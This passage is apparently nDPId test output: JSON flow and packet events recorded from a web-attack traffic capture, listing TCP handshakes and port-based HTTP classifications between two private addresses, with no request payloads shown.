+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":2,"flow_last_seen":1499347504529,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347504529,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4iwP0\/y\/biXFg6AScSB+NgAAAgQFtAQCCAoD5MWlATr0MAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4479,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":3,"flow_last_seen":1499347504530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347504530,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MbNAAD4GlCWsEAABwKgKMuIsAFBuJcWDD9P8wIAQAOUdPgAAAQEICgE69DAD5MWl"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347505774,"flow_last_seen":1499347505774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1499347505774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347505774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e\/VAAD4GSdusEAABwKgKMuI6AFCzho6SAAAAAKACchBDvgAAAgQFtAQCCAoBOvVnAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4490,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":2,"flow_last_seen":1499347505774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347505774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4joOXGebs4aOk6AScSAD5AAAAgQFtAQCCAoD5MbdATr1ZwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":3,"flow_last_seen":1499347505775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347505775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e\/ZAAD4GSeKsEAABwKgKMuI6AFCzho6TDlxnnIAQAOWi6wAAAQEICgE69WcD5Mbd"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4507,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347508344,"flow_last_seen":1499347508344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347508344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4507,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1499347508344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347508344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QeJAAD4Gg+6sEAABwKgKMuJUAFDv7LYIAAAAAKACchDdRAAAAgQFtAQCCAoBOvfqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":2,"flow_last_seen":1499347508344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347508344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4lSsQaQu7+y2CaAScSDAbwAAAgQFtAQCCAoD5MlfATr36gEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":3,"flow_last_seen":1499347508345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347508345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QeNAAD4Gg\/WsEAABwKgKMuJUAFDv7LYJrEGkL4AQAOVfdwAAAQEICgE69+oD5Mlf"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347509601,"flow_last_seen":1499347509601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347509601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1499347509601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347509601,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U2ZAAD4GcmqsEAABwKgKMuJiAFBgjKpCAAAAAKACchB3IwAAAgQFtAQCCAoBOvkkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":2,"flow_last_seen":1499347509601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347509601,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4mJHoK+XYIyqQ6AScSCyTAAAAgQFtAQCCAoD5MqZATr5JAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":3,"flow_last_seen":1499347509602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347509602,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U2dAAD4GcnGsEAABwKgKMuJiAFBgjKpDR6CvmIAQAOVRVAAAAQEICgE6+SQD5MqZ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347512081,"flow_last_seen":1499347512081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347512081,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1499347512081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347512081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87jVAAD4G15qsEAABwKgKMuJ8AFAKmxWlAAAAAKACchBfLAAAAgQFtAQCCAoBOvuQAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":2,"flow_last_seen":1499347512081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347512081,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4nwCiqB4CpsVpqAScSDsHgAAAgQFtAQCCAoD5M0FATr7kAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":3,"flow_last_seen":1499347512082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347512082,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07jZAAD4G16GsEAABwKgKMuJ8AFAKmxWmAoqgeYAQAOWLJgAAAQEICgE6+5AD5M0F"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4549,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347513353,"flow_last_seen":1499347513353,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347513353,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4549,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1499347513353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347513353,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ef1AAD4GS9OsEAABwKgKMuKKAFAHuIUzAAAAAKACchDxNAAAAgQFtAQCCAoBOvzOAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":2,"flow_last_seen":1499347513353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347513353,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4oqWR\/ViB7iFNKAScSCUQQAAAgQFtAQCCAoD5M5DATr8zgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":3,"flow_last_seen":1499347513353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347513353,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ef5AAD4GS9qsEAABwKgKMuKKAFAHuIU0lkf1Y4AQAOUzSQAAAQEICgE6\/M4D5M5D"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347514648,"flow_last_seen":1499347514648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347514648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1499347514648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347514648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81oFAAD4G706sEAABwKgKMuKYAFBs5yiTAAAAAKACchDnUwAAAgQFtAQCCAoBOv4SAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4562,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":2,"flow_last_seen":1499347514648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347514648,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4pgH3WT1bOcolKAScSCn9AAAAgQFtAQCCAoD5M+HATr+EgEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":3,"flow_last_seen":1499347514648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347514648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01oJAAD4G71WsEAABwKgKMuKYAFBs5yiUB91k9oAQAOVG\/AAAAQEICgE6\/hID5M+H"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
